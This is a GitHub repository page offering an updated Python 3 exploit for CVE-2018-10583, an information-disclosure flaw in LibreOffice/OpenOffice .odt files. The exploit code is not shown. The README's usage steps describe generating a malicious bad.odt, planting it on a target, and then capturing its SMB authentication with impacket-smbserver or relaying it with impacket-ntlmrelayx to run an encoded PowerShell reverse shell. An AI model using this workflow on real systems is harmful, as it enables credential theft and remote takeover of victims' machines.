Skip to content

Updated python3 exploit for CVE-2018-10583 (LibreOffice/Open Office - '.odt' Information Disclosure )

Notifications You must be signed in to change notification settings

octodi/CVE-2018-10583

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

2 Commits
 
 
 
 

Repository files navigation

Updated python3 exploit for CVE-2018-10583 (LibreOffice/Open Office - '.odt' Information Disclosure)

original credits to : https://www.exploit-db.com/exploits/44564

Usage

  1. Install ezodf module with pip or pip3
  2. Run the exploit with python3 it will generate a bad.odt file, upload it to the box
  3. And then listen for requests to your smb server impacket-smbserver share share -smb2support or sudo impacket-ntlmrelayx --no-http-server -smb2support -t <your_ip> -c "powershell -enc <one liner rever shell>"

About

Updated python3 exploit for CVE-2018-10583 (LibreOffice/Open Office - '.odt' Information Disclosure )

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages